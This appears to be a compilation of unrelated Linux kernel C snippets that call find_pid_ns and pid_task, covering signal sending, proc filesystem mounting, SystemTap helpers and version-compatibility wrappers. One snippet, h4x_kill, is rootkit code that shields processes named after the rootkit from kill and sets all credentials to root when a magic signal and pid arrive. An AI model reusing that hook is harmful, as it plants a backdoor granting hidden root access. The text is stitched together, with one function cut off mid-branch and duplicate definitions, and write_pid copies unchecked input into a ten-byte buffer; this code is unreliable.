static ssize_t write_pid(struct file *file,const char __user *buf,size_t count,loff_t *ppos){
//Send signal to user Space
char mybuf[10];
int ret = 0;
int pid = 0;
struct siginfo info;
struct task_struct *t;
copy_from_user(mybuf,buf,count);
sscanf(mybuf,"%d",&pid);
printk("pid = %d\n",pid);
memset(&info,0,sizeof(struct siginfo));
info.si_signo = SIG_TEST;
info.si_code = SI_QUEUE;
info.si_int = 1234;
rcu_read_lock();
//t = find_task_by_pid_type(PIDTYPE_PID, pid); //find the task_struct associated with this pid
t = pid_task(find_pid_ns(pid, &init_pid_ns), PIDTYPE_PID);
if(t == NULL){
printk(KERN_INFO "no such pid\n");
rcu_read_unlock();
return -ENODEV;
}
rcu_read_unlock();
ret = send_sig_info(SIG_TEST,&info, t);
if(ret<0){
printk(KERN_INFO "send signal error");
}
return count;
}
void send_signal(unsigned long arg){
int ret;
struct siginfo info;
struct task_struct *t;
/* send the signal */
memset(&info, 0, sizeof(struct siginfo));
info.si_signo = SIG_TEST;
info.si_code = SI_QUEUE; // this is bit of a trickery: SI_QUEUE is normally used by sigqueue from user space,
// and kernel space should use SI_KERNEL. But if SI_KERNEL is used the real_time data
// is not delivered to the user space signal handler function.
info.si_int = arg; //real time signals may have 32 bits of data.
rcu_read_lock();
// t = find_task_by_pid_type(PIDTYPE_PID, pid); //find the task_struct associated with this pid
t = pid_task(find_pid_ns(user_process_pid, &init_pid_ns), PIDTYPE_PID);
if(t == NULL){
printk(KERN_WARNING "no such pid\n");
rcu_read_unlock();
return -ENODEV;
}
rcu_read_unlock();
ret = send_sig_info(SIG_TEST, &info, t); //send the signal
if (ret < 0) {
printk("error sending signal\n");
return ret;
}
return ret;
}
static int proc_get_sb(struct file_system_type *fs_type,
int flags, const char *dev_name, void *data, struct vfsmount *mnt)
{
int err;
struct super_block *sb;
struct pid_namespace *ns;
struct proc_inode *ei;
char *options;
if (proc_mnt) {
/* Seed the root directory with a pid so it doesn't need
* to be special in base.c. I would do this earlier but
* the only task alive when /proc is mounted the first time
* is the init_task and it doesn't have any pids.
*/
ei = PROC_I(proc_mnt->mnt_sb->s_root->d_inode);
if (!ei->pid)
ei->pid = find_get_pid(1);
}
if (flags & MS_KERNMOUNT) {
ns = (struct pid_namespace *)data;
options = NULL;
} else {
ns = task_active_pid_ns(current);
options = data;
}
sb = sget(fs_type, proc_test_super, proc_set_super, ns);
if (IS_ERR(sb))
return PTR_ERR(sb);
if (!sb->s_root) {
sb->s_flags = flags;
if (!proc_parse_options(options, ns)) {
deactivate_locked_super(sb);
return -EINVAL;
}
err = proc_fill_super(sb);
if (err) {
deactivate_locked_super(sb);
return err;
}
ei = PROC_I(sb->s_root->d_inode);
if (!ei->pid) {
rcu_read_lock();
ei->pid = get_pid(find_pid_ns(1, ns));
rcu_read_unlock();
}
sb->s_flags |= MS_ACTIVE;
ns->proc_mnt = mnt;
}
simple_set_mnt(mnt, sb);
return 0;
}
static struct task_struct *my_find_task_by_pid(pid_t pid) {
#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,28)
return pid_task(find_pid_ns(pid, &init_pid_ns), PIDTYPE_PID);
#elif LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,26)
/* The pid has come from userspace, so we can use f_t_b_vpid to look up */
return find_task_by_vpid(pid);
#else
return find_task_by_pid(pid);
#endif
}
static inline struct task_struct* rasmemele_task(struct RasMemEle* ele)
{
struct pid_namespace *ns = current->nsproxy->pid_ns;
struct pid* pd = find_pid_ns(ele->args.pid, ns);
struct task_struct* tsk;
rcu_read_lock();
tsk = pid_task(pd, PIDTYPE_PID);
rcu_read_unlock();
return tsk;
}
/*
Don't allow your process to be killed
Allow local root escalation using magic signal dan pid
*/
asmlinkage int h4x_kill(int pid, int sig) {
int r;
struct task_struct *cur;
cur = pid_task(find_pid_ns(pid, &init_pid_ns), PIDTYPE_PID);
if(cur){
if(strstr(cur->comm,_H4X0R_)||strstr(cur->comm,KBEAST)){
return -EACCES;
}
}
if(sig == _MAGIC_SIG_ && pid == _MAGIC_PID_){
struct cred *new=prepare_creds();if(new){new->uid=0;new->euid=0;new->gid=0;new->egid=0;commit_creds(new);return 0;}
return 0;
}
r = (*o_kill)(pid,sig);
return r;
}
static struct dentry *proc_mount(struct file_system_type *fs_type,
int flags, const char *dev_name, void *data)
{
int err;
struct super_block *sb;
struct pid_namespace *ns;
struct proc_inode *ei;
char *options;
if (flags & MS_KERNMOUNT) {
ns = (struct pid_namespace *)data;
options = NULL;
} else {
ns = current->nsproxy->pid_ns;
options = data;
}
sb = sget(fs_type, proc_test_super, proc_set_super, ns);
if (IS_ERR(sb))
return ERR_CAST(sb);
if (!proc_parse_options(options, ns)) {
deactivate_locked_super(sb);
return ERR_PTR(-EINVAL);
}
if (!sb->s_root) {
sb->s_flags = flags;
err = proc_fill_super(sb);
if (err) {
deactivate_locked_super(sb);
return ERR_PTR(err);
}
sb->s_flags |= MS_ACTIVE;
}
ei = PROC_I(sb->s_root->d_inode);
if (!ei->pid) {
rcu_read_lock();
ei->pid = get_pid(find_pid_ns(1, ns));
rcu_read_unlock();
}
return dget(sb->s_root);
}
static void
stapiu_decrement_process_semaphores(struct stapiu_process *p,
struct list_head *consumers)
{
struct task_struct *task;
rcu_read_lock();
#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,24)
/* We'd like to call find_task_by_pid_ns() here, but it isn't
* exported. So, we call what it calls... */
task = pid_task(find_pid_ns(p->tgid, &init_pid_ns), PIDTYPE_PID);
#else
task = find_task_by_pid(p->tgid);
#endif
/* The task may have exited while we weren't watching. */
if (task) {
struct stapiu_consumer *c;
/* Holding the rcu read lock makes us atomic, and we
* can't write userspace memory while atomic (which
* could pagefault). So, instead we lock the task
* structure, then release the rcu read lock. */
get_task_struct(task);
rcu_read_unlock();
list_for_each_entry(c, consumers, target_consumer) {
if (c->sdt_sem_offset) {
unsigned long addr = p->base + c->sdt_sem_offset;
stapiu_write_task_semaphore(task, addr,
(unsigned short) -1);
}
}
put_task_struct(task);
}
else {
struct pid *find_vpid(int nr)
{
return find_pid_ns(nr, task_active_pid_ns(current));
}
struct pid *find_pid(int nr)
{
return find_pid_ns(nr, &init_pid_ns);
}
struct pid *find_vpid(int nr)
{
return find_pid_ns(nr, current->nsproxy->pid_ns);
}
static inline int kill_proc(pid_t pid, int sig, int priv)
{
//return kill_pid(sig, find_pid_ns(pid, &init_pid_ns), priv);
return kill_pid(find_pid_ns(pid, &init_pid_ns), sig, priv);
}
